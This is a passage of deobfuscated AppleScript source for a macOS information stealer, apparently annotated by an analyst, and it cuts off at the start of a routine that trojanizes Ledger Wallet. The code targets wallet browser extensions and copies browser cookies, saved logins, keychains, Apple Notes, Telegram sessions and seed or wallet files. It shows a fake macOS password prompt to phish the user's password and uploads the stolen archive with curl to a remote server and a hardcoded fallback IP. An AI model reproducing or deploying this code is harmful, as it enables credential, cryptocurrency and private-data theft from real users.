"jfmajkmgjpjognffefopllhaijknhnmm", "jgnfghanfbjmimbdmnjfofnbcgpkbegj", "jhfjfclepacoldmjmkmdlmganfaalklb", "jiepnaheligkibgcjgjepjfppgbcghmp", "jiidiaalihmmhddjgbnbgdfflelocpak", "jiiigigdinhhgjflhljdkcelcjfmplnd", "jkjgekcefbkpogohigkgooodolhdgcda", "jkoeaghipilijlahjplgbfiocjhldnap", "jnkelfanjkeadonecabehalmbgpfodjm", "jnldfbidonfeldmalbflbmlebbipcnle", "jnlgamecbpmbajjfhmmmlhejkemejdma", "jnmbobjmhlngoefaiojfljckilhhlhcj", "jojhfeoedkpkglbfimdfabpdfjaoolaf", "kamfleanhcmjelnhaeljonilnmjpkcjc", "kbdcddcmgoplfockflacnnefaehaiocb", "keenhcnmdmjjhincpilijphpiohdppno", "kennjipeijpeengjlogfdjkiiadhbmjl", "kfdniefadaanbjodldohaedphafoffoh", "kgdijkcfiglijhaglibaidbipiejjfdp", "kglcipoddmbniebnibibkghfijekllbl", "khhapgacijodhjokkcjmleaempmchlem", "khpkpbbcccdmmclmpigdgddabeilkdpd", "kilnpioakcdndlodeeceffgjdpojajlo", "kjjebdkfeagdoogagbhepmbimaphnfln", "kkilomkmpmkbdnfelcpgckmpcaemjcdh", "kkpllbgjhchghjapjbinnoddmciocphm", "kkpllkodjeloidieedojogacfhpaihoh", "klghhnkeealcohjjanjjdaeeggmfmlpl", "klnaejjgbibmhlephnhpmaofohgkpgkd", "kmcfomidfpdkfieipokbalgegidffkal", "kmhcihpebfmpgmihbkipmjlmmioameka", "kmphdnilpmdejikjdnlbcnmnabepfgkh", "kncchdigobghenbbaddojjnnaogfppfj", "kpfchfdkjhcoekhdldggegebfakaaiog", "kppfdiipphfccemcignhifpjkapfbihd", "lakggbcodlaclcbbbepmkpdhbcomcgkd", "lbjapbcmmceacocpimbpbidpgmlmoaao", "lccbohhgfkdikahanoclbdmaolidjdfl", "lcmncloheoekhbmljjlhdlaobkedjbgd", "ldinpeekobnhjjdofggfgjlcehhmanlj", "lfmmjkfllhmfmkcobchabopkcefjkoip", "lgbjhdkjmpgjgcbcdlhkokkckpjmedgc", "lgmpcpglpngdoalbgeoldeajfclnhafa", "lmkncnlpeipongihbffpljgehamdebgi", "lnnnmfcpbkafcpgdilckhmhbkkbpkmid", "loinekcabhlmhjjbocijdoimmejangoa", "lpfcbjknijpeeillifnkikgncikgfhdo", "lpilbniiabackdjcionkobglmddfbcjo", "mapbhaebnddapnmifbbkgeedkeplgjmf", "mcohilncbfahbmgdjkbpemcciiolgcge", "mdjmfdffdcmnoblignmgpommbefadffd", "mdnaglckomeedfbogeajfajofmfgpoae", "mfgccjchihfkkindfppnaooecgfneiii", "mfhbebgoclkghebffdldpobeajmbecfk", "mgffkfbidihjpoaomajlbgchddlicgpn", "mjgkpalnahacmhkikiommfiomhjipgjn", "mkchoaaiifodcflmbaphdgeidocajadp", "mkpegjkblkkefacfnmkajcjmabijhclg", "mlbnicldlpdimbjdcncnklfempedeipj", "mlhakagmgkmonhdonhkpjeebfphligng", "mmclamjkknobggpiohfneimmnlggagok", "mmhlniccooihdimnnjhamobppdhaolme", "mmmjbcfofconkannjonfmjjajpllddbg", "mnfifefkajgofkcjkemidiaecocnkjeh", "modjfdjcodmehnpccdjngmdfajggaoeh", "momakdpclmaphlamgjcndbgfckjfpemp", "naepdomgkenhinolocfifgehidddafch", "nbdhibgjnjpnkajaghbffjbkcgljfgdi", "nbdpmlhambbdkhkmbfpljckjcmgibalo", "nebnhfamliijlghikdgcigoebonmoibm", "nhbicdelgedinnbcidconlnfeionhbml", "nhlnehondigmgckngjomcpcefcdplmgc", "nhnkbkgjikgcigadomkphalanndcapjk", "niiaamnmgebpeejeemoifgdndgeaekhe", "nkbihfbeogaeaoehlefnkodbefgpgknn", "nknhiehlklippafakaeklbeglecifhad", "nlgbhdfgdhgbiamfdfmbikcdghidoadd", "nlgnepoeokdfodgjkjiblkadkjbdfmgd", "nngceckbapebfimnlniiiahkandclblb", "nopnfnlbinpfoihclomelncopjiioain", "nphplpgoakhhjchkkhmiggakijnkhfnd", "oafedfoadhdjjcipmcbecikgokpaphjk", "oboonakemofpalcgghocfoadofidjkkk", "ocjobpilfplciaddcbafabcegbilnbnb", "oiohdnannmknmdlddkdejbmplhbdcbee", "ojbcfhjmpigfobfclfflafhblgemeidi", "ojggmchlghnjlapmfbnjholfjkiidbch", "omaabbefbmiijedngplfjmnooppbclkk", "onhogfjeacnfoofkfgppdlbmlmnplgbn", "ookjlbkiijinhpmnjffcofjonbfbgaoc", "opcgpfmipidbgpenhmajoajpbobppdil", "opfgelmcmbiajamepnmloijbpoleiama", "panpgppehdchfphcigocleabcmcgfoca", "papngmkmknnmfhabbckobgfpihpdgplk", "pcndjhkinnkaohffealmlmhaepkpmgkb", "pdadjkfkgcafgbceimcpbkalnfnepbnk", "pdliaogehgdbhbnmkklieghmmjkpigpa", "penjlddjkjgpnkllboccdgccekpkcbin", "pfccjkejcgoppjnllalolplgogenfojk", "pgiaagfkgcbnmiiolekcfmljdagdhlcm", "phkbamefinggmakgklpkljjmgibohnba", "pmmnimefaichbcnbndcfpaagbepnjaig", "pnlccmojcmeohlpggmfnbbiapkmbliob", "pnndplcbkakcplkjnolgbkdgjikjednm", "pocmplpaccanhmnllbbkpgfliimjljgo", "ppbibelpcjmhbdihakflkdcoccbgbkpo", "ppdadbejkmjnefldpcdjhnkpbjkikoip"}
on decodeSubtract(encodedValues, keyValues)
set decodedStr to ""
set checksum to 0
repeat with idx from 1 to count of encodedValues
set checksum to (checksum + (item idx of encodedValues)) mod 9999
set decodedStr to decodedStr & (character id ((item idx of encodedValues) - (item idx of keyValues)))
set checksum to (checksum * 3) mod 9999
end repeat
return decodedStr
end decodeSubtract
on decodeAdd(encodedValues, keyValues)
set decodedStr to ""
set checksum to 1
repeat with idx from 1 to count of encodedValues
set checksum to (checksum + (item idx of keyValues)) mod 9999
set decodedStr to decodedStr & (character id ((item idx of encodedValues) + (item idx of keyValues)))
set checksum to checksum + 1
end repeat
return decodedStr
end decodeAdd
on decodeSubConst(encodedValues, keyValues, constantOffset)
set decodedStr to ""
set checksum to 0
repeat with idx from 1 to count of encodedValues
set charCode to ((item idx of encodedValues) - constantOffset)
set charCode to charCode - (item idx of keyValues)
set decodedStr to decodedStr & (character id charCode)
set checksum to (checksum + charCode) mod 9999
end repeat
return decodedStr
end decodeSubConst
on mkdirPath(dirPath)
try
set hwyksoup0 to "mkdir -p " -- DECODED
do shell script hwyksoup0 & quoted form of dirPath
end try
end mkdirPath
on readFileContents(filePath)
try
set posixFile to POSIX file filePath
set fileData to read posixFile
return fileData
end try
return ""
end readFileContents
on getFileName(filePath)
try
set wzdiqcfujfk to (reverse of every character of filePath) as string
set dfgvejlqvi to (offset of "/" in wzdiqcfujfk) - 1
set fzrirmuhdgoa to text 1 thru dfgvejlqvi of wzdiqcfujfk
set dqnmwfga to (reverse of every character of fzrirmuhdgoa) as string
return dqnmwfga
end try
return ""
end getFileName
on getParentDir(filePath)
try
set xqcioqahfq to offset of "/" in (reverse of every character of filePath) as string
set parentDir to text 1 thru -(xqcioqahfq + 1) of filePath
return parentDir
end try
return ""
end getParentDir
on writeToFile(fileContent, filePath)
try
set parentDir to getParentDir(filePath)
mkdirPath(parentDir)
set fileHandle to (open for access filePath with write permission)
set eof of fileHandle to 0
write fileContent to fileHandle starting at eof
close access fileHandle
end try
end writeToFile
on copyFile(sourcePath, destPath)
try
set parentDir to getParentDir(destPath)
mkdirPath(parentDir)
set hwyksoup1 to "cp -f " -- DECODED
do shell script hwyksoup1 & quoted form of sourcePath & " " & quoted form of destPath
end try
end copyFile
on isDirectory(dirPath)
try
set hwyksoup2 to "file -b " -- DECODED
set fileType to (do shell script hwyksoup2 & quoted form of dirPath)
set hwyksoup3 to "directory" -- DECODED
if fileType ends with hwyksoup3 then
return true
end if
end try
return false
end isDirectory
on copyDirectoryRecursive(sourcePath, destPath)
try
set hwyksoup4 to ".DS_Store" -- DECODED
set hwyksoup5 to "Partitions" -- DECODED
set hwyksoup6 to "Code Cache" -- DECODED
set hwyksoup7 to "Cache" -- DECODED
set hwyksoup8 to "market-histo" -- DECODED
set hwyksoup9 to "ry-cache.json" -- DECODED
set hwyksoup10 to "journals" -- DECODED
set hwyksoup11 to "Previews" -- DECODED
set hwyksoup12 to "GPUCache" -- DECODED
set hwyksoup13 to "DawnCache" -- DECODED
set hwyksoup14 to "Crashpad" -- DECODED
set hwyksoup15 to "DawnWebGPUCache" -- DECODED
set hwyksoup16 to "DawnGraphiteCache" -- DECODED
set hwyksoup17 to "__update__" -- DECODED
set hwyksoup18 to "tor" -- DECODED
set hwyksoup19 to "dumps" -- DECODED
set hwyksoup20 to "emoji" -- DECODED
set hwyksoup21 to "user_data" -- DECODED
set hwyksoup22 to "user_data#2" -- DECODED
set hwyksoup23 to "user_data#3" -- DECODED
set excludedDirs to {hwyksoup4, hwyksoup5, hwyksoup6, hwyksoup7, (hwyksoup8 & hwyksoup9), hwyksoup10, hwyksoup11, hwyksoup12, hwyksoup13, hwyksoup14, hwyksoup15, hwyksoup16, hwyksoup17, hwyksoup18, hwyksoup19, hwyksoup20, hwyksoup21, hwyksoup22, hwyksoup23}
set folderItems to list folder sourcePath without invisibles
mkdirPath(destPath)
repeat with itemRef in folderItems
set itemName to contents of itemRef
if itemName is not in excludedDirs then
set srcItemPath to sourcePath & "/" & itemName
set dstItemPath to destPath & "/" & itemName
if isDirectory(srcItemPath) then
copyDirectoryRecursive(srcItemPath, dstItemPath)
else
copyFile(srcItemPath, dstItemPath)
end if
end if
end repeat
end try
end copyDirectoryRecursive
on findProfilePath(filePath, thdtdenwziz)
try
set posixFile to POSIX file filePath
set fileData to read posixFile
set jlxaqvczs to offset of thdtdenwziz in fileData
if jlxaqvczs is 0 then
set hwyksoup24 to "not found" -- DECODED
return hwyksoup24
end if
set vqcnnoup to jlxaqvczs + (length of thdtdenwziz)
set bdximdzzxwm to text vqcnnoup thru (vqcnnoup + 55) of fileData
set kqzguojkonwi to offset of "\\" in bdximdzzxwm
if kqzguojkonwi is 0 then
set hwyksoup25 to "not found" -- DECODED
return hwyksoup25
end if
set extractedValue to text vqcnnoup thru (vqcnnoup + kqzguojkonwi - 2) of fileData
return extractedValue
on error
set hwyksoup26 to "not found" -- DECODED
return hwyksoup26
end try
end findProfilePath
on stealFirefoxExtensions(profilePath, stagingDir)
try
set hwyksoup27 to "/storage/default/" -- DECODED
set jzfglxucatcu to profilePath & hwyksoup27
set zjftqoeox to list folder jzfglxucatcu without invisibles
repeat with gtlootfycp in zjftqoeox
set hwyksoup28 to "moz-extension" -- DECODED
if gtlootfycp starts with hwyksoup28 then
set hwyksoup29 to "/idb/" -- DECODED
set extensionDir to jzfglxucatcu & gtlootfycp & hwyksoup29
try
set idbItems to list folder extensionDir without invisibles
repeat with idbItem in idbItems
set hwyksoup30 to ".sqlite" -- DECODED
if idbItem ends with hwyksoup30 then
copyFile(extensionDir & idbItem, stagingDir & "/" & gtlootfycp & "/" & idbItem)
end if
end repeat
end try
end if
end repeat
end try
end stealFirefoxExtensions
on stealFirefoxBrowserData(browserName, iwignsggj, stagingDir, browserFlag)
try
set hwyksoup31 to "/cookies.sqlite" -- DECODED
set hwyksoup32 to "/formhistory.sqlite" -- DECODED
set hwyksoup33 to "/key4.db" -- DECODED
set hwyksoup34 to "/logins.json" -- DECODED
set hwyksoup35 to "/extensions.json" -- DECODED
set browserFiles to {hwyksoup31, hwyksoup32, hwyksoup33, hwyksoup34, hwyksoup35}
set hwyksoup36 to "true" -- DECODED
if browserFlag is equal to hwyksoup36 then
set hwyksoup37 to "/places.sqlite" -- DECODED
set browserFiles to browserFiles & {hwyksoup37}
end if
set profileList to list folder iwignsggj without invisibles
repeat with profileName in profileList
set hwyksoup38 to "ff/" -- DECODED
set browserOutputDir to stagingDir & hwyksoup38 & browserName & "_" & profileName
stealFirefoxExtensions(iwignsggj & profileName, browserOutputDir)
set profilePath to iwignsggj & profileName
repeat with browserFile in browserFiles
copyFile(profilePath & browserFile, browserOutputDir & browserFile)
end repeat
end repeat
end try
end stealFirefoxBrowserData
on hasTargetExtension(sourcePath, targetNames)
try
set folderItems to list folder sourcePath without invisibles
repeat with mpezkjydp in folderItems
repeat with mvldbrvd in targetNames
if (mpezkjydp contains mvldbrvd) then
return true
end if
end repeat
end repeat
end try
return false
end hasTargetExtension
on stealMatchingDirs(sourcePath, stagingDir, targetNames, includeSubdirs)
try
set folderItems to list folder sourcePath without invisibles
repeat with mpezkjydp in folderItems
repeat with mvldbrvd in targetNames
if (mpezkjydp contains mvldbrvd) then
set matchedPath to sourcePath & mpezkjydp
set outputPath to stagingDir & "/" & mvldbrvd
set ydqpsdubv to true
if includeSubdirs then
set hwyksoup39 to "/IndexedDB/" -- DECODED
set outputPath to outputPath & hwyksoup39
end if
if ydqpsdubv then
copyDirectoryRecursive(matchedPath, outputPath)
end if
end if
end repeat
end repeat
end try
end stealMatchingDirs
on stealChromiumBrowserData(stagingDir, browserPaths, browserFlag)
set hwyksoup40 to "/Network/Cookies" -- DECODED
set hwyksoup41 to "/Cookies" -- DECODED
set hwyksoup42 to "/Web Data" -- DECODED
set hwyksoup43 to "/Login Data" -- DECODED
set hwyksoup44 to "/Local" -- DECODED
set hwyksoup45 to " Exten" -- DECODED
set hwyksoup46 to "sion S" -- DECODED
set hwyksoup47 to "etting" -- DECODED
set hwyksoup48 to "s/" -- DECODED
set hwyksoup49 to "/IndexedDB/" -- DECODED
set hwyksoup50 to "/Loca" -- DECODED
set hwyksoup51 to "l Sto" -- DECODED
set hwyksoup52 to "rage/" -- DECODED
set hwyksoup53 to "level" -- DECODED
set hwyksoup54 to "db/" -- DECODED
set browserFiles to {hwyksoup40, hwyksoup41, hwyksoup42, hwyksoup43, (hwyksoup44 & hwyksoup45 & hwyksoup46 & hwyksoup47 & hwyksoup48), hwyksoup49, (hwyksoup50 & hwyksoup51 & hwyksoup52 & hwyksoup53 & hwyksoup54)}
set hwyksoup55 to "true" -- DECODED
if browserFlag is equal to hwyksoup55 then
set hwyksoup56 to "/History" -- DECODED
set browserFiles to browserFiles & {hwyksoup56}
end if
repeat with zctzvrbhtfey in browserPaths
set browserName to item 1 of zctzvrbhtfey
set profileDir to item 2 of zctzvrbhtfey
set hwyksoup57 to "Chromium/" -- DECODED
set bnrjxjahl to stagingDir & hwyksoup57 & browserName & "_"
try
set profileList to list folder profileDir without invisibles
repeat with profileName in profileList
set hwyksoup58 to "Default" -- DECODED
set hwyksoup59 to "Profile" -- DECODED
if ((profileName as string) is equal to hwyksoup58) or ((profileName as string) contains hwyksoup59) then
set foundTargetExt to false
repeat with jrwsevlksd in browserFiles
set sourcePath to (profileDir & profileName & jrwsevlksd)
set rrdkrigk to jrwsevlksd
set hwyksoup60 to "/Network/Cookies" -- DECODED
if ((jrwsevlksd as string) is equal to hwyksoup60) then
set hwyksoup61 to "/Cookies" -- DECODED
set rrdkrigk to hwyksoup61
end if
set hwyksoup62 to "/Local" -- DECODED
set hwyksoup63 to " Exten" -- DECODED
set hwyksoup64 to "sion S" -- DECODED
set hwyksoup65 to "etting" -- DECODED
set hwyksoup66 to "s/" -- DECODED
set hwyksoup67 to "/IndexedDB/" -- DECODED
set hwyksoup68 to "/Local Stor" -- DECODED
set hwyksoup69 to "age/leveldb/" -- DECODED
if ((jrwsevlksd as string) is equal to (hwyksoup62 & hwyksoup63 & hwyksoup64 & hwyksoup65 & hwyksoup66)) then
if hasTargetExtension(sourcePath, targetExtensionIds) then
set foundTargetExt to true
end if
stealMatchingDirs(sourcePath, bnrjxjahl & profileName, targetExtensionIds, false)
else if (jrwsevlksd as string) is equal to hwyksoup67 then
if hasTargetExtension(sourcePath, targetExtensionIds) then
set foundTargetExt to true
end if
stealMatchingDirs(sourcePath, bnrjxjahl & profileName, targetExtensionIds, true)
else if (jrwsevlksd as string) is equal to (hwyksoup68 & hwyksoup69) then
if foundTargetExt then
set hwyksoup70 to "/Local " -- DECODED
set hwyksoup71 to "Storage" -- DECODED
set hwyksoup72 to "/leveld" -- DECODED
set hwyksoup73 to "b/" -- DECODED
set destPath to bnrjxjahl & profileName & (hwyksoup70 & hwyksoup71 & hwyksoup72 & hwyksoup73)
copyDirectoryRecursive(sourcePath, destPath)
end if
else
set destPath to bnrjxjahl & profileName & rrdkrigk
copyFile(sourcePath, destPath)
end if
end repeat
end if
end repeat
end try
end repeat
end stealChromiumBrowserData
on validatePassword(username, password)
try
set hwyksoup74 to "dscl . authonly " -- DECODED
set cmdResult to do shell script hwyksoup74 & quoted form of username & space & quoted form of password
if cmdResult is not equal to "" then
return false
else
return true
end if
on error
return false
end try
end validatePassword
on promptForPassword(username, stagingDir)
try
if validatePassword(username, "") then
set hwyksoup75 to "security 2>&1 > /de" -- DECODED
set hwyksoup76 to "v/null find-generic" -- DECODED
set hwyksoup77 to "-password -ga 'Chro" -- DECODED
set hwyksoup78 to "me' | awk '{print $" -- DECODED
set hwyksoup79 to "2}'" -- DECODED
set chromePassword to do shell script (hwyksoup75 & hwyksoup76 & hwyksoup77 & hwyksoup78 & hwyksoup79)
set hwyksoup80 to "masterpass-chrome" -- DECODED
writeToFile(chromePassword as string, stagingDir & hwyksoup80)
else
set firstAttempt to true
repeat
if firstAttempt then
set hwyksoup81 to "macOS wants to make changes. " -- DECODED
set hwyksoup82 to "Enter the password for user \"" -- DECODED
set hwyksoup83 to "\" to allow this." -- DECODED
set promptMsg to (hwyksoup81 & hwyksoup82) & username & hwyksoup83
else
set hwyksoup84 to "The password you entered is incorrect" -- DECODED
set hwyksoup85 to ". Please enter the password for user \"" -- DECODED
set promptMsg to (hwyksoup84 & hwyksoup85) & username & "\"."
end if
set hwyksoup86 to "macOS" -- DECODED
set ttkbntvgcena to display dialog promptMsg default answer "" with icon caution buttons {"OK"} default button "OK" with hidden answer with title hwyksoup86
set enteredPassword to text returned of ttkbntvgcena
set firstAttempt to false
if validatePassword(username, enteredPassword) then
return enteredPassword
end if
end repeat
end if
end try
return ""
end promptForPassword
on stealSafariKeychainNotes(stagingDir)
try
set hwyksoup87 to "FileGrabber/" -- DECODED
set grabberDir to stagingDir & hwyksoup87
set grabberPosix to POSIX file grabberDir
set hwyksoup88 to "NotesMedia/" -- DECODED
set mediaOutputDir to POSIX file (grabberDir & hwyksoup88)
set hwyksoup89 to "txt" -- DECODED
set hwyksoup90 to "pdf" -- DECODED
set hwyksoup91 to "docx" -- DECODED
set hwyksoup92 to "wallet" -- DECODED
set hwyksoup93 to "key" -- DECODED
set hwyksoup94 to "keys" -- DECODED
set hwyksoup95 to "doc" -- DECODED
set hwyksoup96 to "jpeg" -- DECODED
set hwyksoup97 to "png" -- DECODED
set hwyksoup98 to "kdbx" -- DECODED
set hwyksoup99 to "rtf" -- DECODED
set hwyksoup100 to "jpg" -- DECODED
set hwyksoup101 to "seed" -- DECODED
set targetFileExts to {hwyksoup89, hwyksoup90, hwyksoup91, hwyksoup92, hwyksoup93, hwyksoup94, hwyksoup95, hwyksoup96, hwyksoup97, hwyksoup98, hwyksoup99, hwyksoup100, hwyksoup101}
set fileSizeTotal to 0
set mediaSizeTotal to 0
set hwyksoup102 to "system_profiler SPHardwareDataT" -- DECODED
set hwyksoup103 to "ype | awk '/UUID/ { print $3 }'" -- DECODED
set keychainUuid to do shell script (hwyksoup102 & hwyksoup103)
mkdirPath(grabberPosix)
mkdirPath(mediaOutputDir)
tell application "Finder"
try
set rildrfevav to (path to home folder as text) & "Library:Cookies:"
set ncpqxcuhj to (rildrfevav & "Cookies.binarycookies")
duplicate (file ncpqxcuhj) to (folder grabberPosix) with replacing
set name of result to "saf1"
end try
set guboelkchm to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
try
duplicate (file "Cookies.binarycookies" of folder guboelkchm) to (folder grabberPosix) with replacing
end try
set jbecclcedtyl to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
try
set tlsrtylmajau to folder jbecclcedtyl
set vhnnxmqzut to {"NoteStore.sqlite", "NoteStore.sqlite-shm", "NoteStore.sqlite-wal"}
repeat with zrvojtlq in vhnnxmqzut
try
duplicate (file zrvojtlq of tlsrtylmajau) to (folder grabberPosix) with replacing
end try
end repeat
end try
set hvszawhl to (jbecclcedtyl & "Accounts:")
try
set lrxklaspaprl to folder hvszawhl
set bufxiyco to every folder of lrxklaspaprl
repeat with pkdjfjnpjmh in bufxiyco
set jhjqlrzst to hvszawhl & name of pkdjfjnpjmh & ":Media:"
set atfawjidrm to every folder of (folder jhjqlrzst)
repeat with iamudktaa in atfawjidrm
set ohovkfcak to jhjqlrzst & name of iamudktaa
set gowuvhzxmrf to every folder of (folder ohovkfcak)
repeat with whnnfrssbx in gowuvhzxmrf
set bpdximpszke to every file of whnnfrssbx
repeat with noanigilaci in bpdximpszke
try
set uhjlmkmn to size of noanigilaci as text
set mediaSizeTotal to mediaSizeTotal + uhjlmkmn
if mediaSizeTotal < 30 * 1024 * 1024 then
duplicate noanigilaci to mediaOutputDir with replacing
else
exit repeat
end if
end try
end repeat
end repeat
end repeat
end repeat
end try
try
set efwwdlxecjb to (path to library folder from user domain as text) & "Safari:"
duplicate (file "Form Values" of folder efwwdlxecjb) to grabberPosix with replacing
end try
try
set ecbyemblka to (path to library folder from user domain as text) & "Keychains:" & keychainUuid
duplicate (folder ecbyemblka) to grabberPosix with replacing
end try
try
set rmpbnwdevbv to every file of desktop
set zmppantsdrp to every file of folder "Documents" of (path to home folder)
repeat with ddhtfsuoh in (rmpbnwdevbv & zmppantsdrp)
set abuxgwuwnwnd to name extension of ddhtfsuoh
if abuxgwuwnwnd is in targetFileExts then
set uhjlmkmn to size of ddhtfsuoh
if (fileSizeTotal + uhjlmkmn) < 30 * 1024 * 1024 then
try
duplicate ddhtfsuoh to (folder grabberPosix) with replacing
set fileSizeTotal to fileSizeTotal + uhjlmkmn
end try
else
exit repeat
end if
end if
end repeat
end try
end tell
end try
end stealSafariKeychainNotes
on stealAppleNotes(stagingDir)
try
set notesText to ""
set tdvqikmfhaje to 0
tell application "Notes"
set notesList to {}
set yssphqkuz to every account
repeat with tennnblkevqi in yssphqkuz
try
set gsmctkynl to properties of every note in tennnblkevqi
set tdvqikmfhaje to tdvqikmfhaje + (length of gsmctkynl)
repeat with zfdtgahniyq in gsmctkynl
try
set gedjyiwjq to (creation date of zfdtgahniyq) & return & (body of zfdtgahniyq)
copy gedjyiwjq to end of notesList
end try
end repeat
end try
end repeat
set notesText to notesList as text
end tell
if tdvqikmfhaje > 0 then
set hwyksoup104 to "<h1>Notes Count: " -- DECODED
set hwyksoup105 to "</h1> <br><br><br> " -- DECODED
set notesHtml to hwyksoup104 & (tdvqikmfhaje as text) & hwyksoup105 & notesText
set hwyksoup106 to "FileGrabber" -- DECODED
set hwyksoup107 to "/notes.html" -- DECODED
writeToFile(notesHtml, stagingDir & (hwyksoup106 & hwyksoup107))
end if
end try
end stealAppleNotes
on stealTelegramData(stagingDir, appDataDir)
try
set hwyksoup108 to "Telegram De" -- DECODED
set hwyksoup109 to "sktop/tdata/" -- DECODED
set telegramDataDir to appDataDir & (hwyksoup108 & hwyksoup109)
set hwyksoup110 to "Telegram Data/" -- DECODED
set telegramOutputDir to stagingDir & hwyksoup110
set hwyksoup111 to "key_datas" -- DECODED
set hwyksoup112 to "key_datas" -- DECODED
copyFile(telegramDataDir & hwyksoup111, telegramOutputDir & hwyksoup112)
set fxzagdbqdc to list folder telegramDataDir without invisibles
set ktijoouxit to {}
repeat with itemName in fxzagdbqdc
set xemnagxey to itemName & "s"
if xemnagxey is in fxzagdbqdc then
copy itemName to end of ktijoouxit
end if
end repeat
repeat with alcdtgkrwxd in ktijoouxit
copyFile(telegramDataDir & alcdtgkrwxd & "s", telegramOutputDir & alcdtgkrwxd & "s")
set hwyksoup113 to "/maps" -- DECODED
set hwyksoup114 to "/maps" -- DECODED
copyFile(telegramDataDir & alcdtgkrwxd & hwyksoup113, telegramOutputDir & alcdtgkrwxd & hwyksoup114)
end repeat
end try
end stealTelegramData
on uploadLargeFile(exfilUrl, username, buildId, clientId, chunkNum)
set icqqrkvfb to 26214400
set hwyksoup115 to "-H \"user: " -- DECODED
set hwyksoup116 to "\" -H \"BuildID: " -- DECODED
set hwyksoup117 to "\" -H \"cl: " -- DECODED
set hwyksoup118 to "\" -H \"cn: " -- DECODED
set curlHeaders to hwyksoup115 & username & hwyksoup116 & buildId & hwyksoup117 & clientId & hwyksoup118 & chunkNum & "\""
set hwyksoup119 to "stat -f%z /" -- DECODED
set hwyksoup120 to "tmp/out.zip" -- DECODED
set uhjlmkmn to (do shell script (hwyksoup119 & hwyksoup120)) as integer
if uhjlmkmn is less than or equal to icqqrkvfb then
uploadSmallFile(exfilUrl, curlHeaders)
return
end if
set hwyksoup121 to "split -b " -- DECODED
set hwyksoup122 to " /tmp/" -- DECODED
set hwyksoup123 to "out.zi" -- DECODED
set hwyksoup124 to "p /tmp" -- DECODED
set hwyksoup125 to "/chunk_" -- DECODED
do shell script hwyksoup121 & icqqrkvfb & (hwyksoup122 & hwyksoup123 & hwyksoup124 & hwyksoup125)
set hwyksoup126 to "head -c 8 " -- DECODED
set hwyksoup127 to "/dev/urand" -- DECODED
set hwyksoup128 to "om | xxd -p" -- DECODED
set uploadId to do shell script (hwyksoup126 & hwyksoup127 & hwyksoup128)
set hwyksoup129 to "ls -1 " -- DECODED
set hwyksoup130 to "/tmp/c" -- DECODED
set hwyksoup131 to "hunk_*" -- DECODED
set hwyksoup132 to " | sort" -- DECODED
set chunkList to paragraphs of (do shell script (hwyksoup129 & hwyksoup130 & hwyksoup131 & hwyksoup132))
set chunkCount to count of chunkList
set allUploaded to true
repeat with qpoczvgi from 1 to chunkCount
set chunkFile to item qpoczvgi of chunkList
set chunkIndex to (qpoczvgi - 1) as text
set hwyksoup133 to " -H \"X-Chunk-ID: " -- DECODED
set hwyksoup134 to "\" -H \"X-Chunk-Part: " -- DECODED
set hwyksoup135 to "\" -H \"X-Ch" -- DECODED
set hwyksoup136 to "unk-Total: " -- DECODED
set chunkCurlCmd to curlHeaders & hwyksoup133 & uploadId & hwyksoup134 & chunkIndex & (hwyksoup135 & hwyksoup136) & (chunkCount as text) & "\""
set uploadSuccess to false
repeat with zgkrofrw from 1 to 3
try
set hwyksoup137 to "curl --conne" -- DECODED
set hwyksoup138 to "ct-timeout 1" -- DECODED
set hwyksoup139 to "20 --max-tim" -- DECODED
set hwyksoup140 to "e 300 -X POS" -- DECODED
set hwyksoup141 to "T " -- DECODED
set hwyksoup142 to " -F \"file=@" -- DECODED
set hwyksoup143 to "/contact" -- DECODED
do shell script (hwyksoup137 & hwyksoup138 & hwyksoup139 & hwyksoup140 & hwyksoup141) & chunkCurlCmd & hwyksoup142 & chunkFile & "\" " & exfilUrl & hwyksoup143
set uploadSuccess to true
exit repeat
end try
delay 10
end repeat
if not uploadSuccess then
set allUploaded to false
end if
end repeat
set hwyksoup144 to "rm -f /tmp/chunk_*" -- DECODED
do shell script hwyksoup144
if allUploaded then return
set hwyksoup145 to "http://92.246.136.14" -- DECODED
set fallbackUrl to hwyksoup145
repeat with zgkrofrw from 1 to 3
try
set hwyksoup146 to "curl --connect-t" -- DECODED
set hwyksoup147 to "imeout 180 --max" -- DECODED
set hwyksoup148 to "-time 600 -X POS" -- DECODED
set hwyksoup149 to "T " -- DECODED
set hwyksoup150 to " -F \"file=@/" -- DECODED
set hwyksoup151 to "tmp/out.zip\" " -- DECODED
set hwyksoup152 to "/contact" -- DECODED
set fallbackCmd to (hwyksoup146 & hwyksoup147 & hwyksoup148 & hwyksoup149) & curlHeaders & (hwyksoup150 & hwyksoup151) & fallbackUrl & hwyksoup152
do shell script fallbackCmd
return
end try
delay 15
end repeat
end uploadLargeFile
on uploadSmallFile(exfilUrl, curlHeaders)
repeat with zgkrofrw from 1 to 3
try
set hwyksoup153 to "curl --connect-timeout 12" -- DECODED
set hwyksoup154 to "0 --max-time 300 -X POST " -- DECODED
set hwyksoup155 to " -F \"file=@/" -- DECODED
set hwyksoup156 to "tmp/out.zip\" " -- DECODED
set hwyksoup157 to "/contact" -- DECODED
do shell script (hwyksoup153 & hwyksoup154) & curlHeaders & (hwyksoup155 & hwyksoup156) & exfilUrl & hwyksoup157
return
end try
delay 15
end repeat
set hwyksoup158 to "http://92.246.136.14" -- DECODED
set fallbackUrl to hwyksoup158
repeat with zgkrofrw from 1 to 3
try
set hwyksoup159 to "curl --connect-t" -- DECODED
set hwyksoup160 to "imeout 120 --max" -- DECODED
set hwyksoup161 to "-time 300 -X POS" -- DECODED
set hwyksoup162 to "T " -- DECODED
set hwyksoup163 to " -F \"f" -- DECODED
set hwyksoup164 to "ile=@/" -- DECODED
set hwyksoup165 to "tmp/ou" -- DECODED
set hwyksoup166 to "t.zip\" " -- DECODED
set hwyksoup167 to "/contact" -- DECODED
do shell script (hwyksoup159 & hwyksoup160 & hwyksoup161 & hwyksoup162) & curlHeaders & (hwyksoup163 & hwyksoup164 & hwyksoup165 & hwyksoup166) & fallbackUrl & hwyksoup167
return
end try
delay 15
end repeat
end uploadSmallFile
on trojanizeLedger(outputDir, appPassword, c2Domain)
try
set hwyksoup168 to "/Applicati" -- DECODED
set hwyksoup169 to "ons/Ledger" -- DECODED
set hwyksoup170 to " Wallet.app" -- DECODED
set appInstallPath to (hwyksoup168 & hwyksoup169 & hwyksoup170)
list folder POSIX file appInstallPath
set hwyksoup171 to "/.logged" -- DECODED
set filePath to outputDir & hwyksoup171
set hwyksoup172 to "rm -f " -- DECODED
do shell script hwyksoup172 & quoted form of filePath
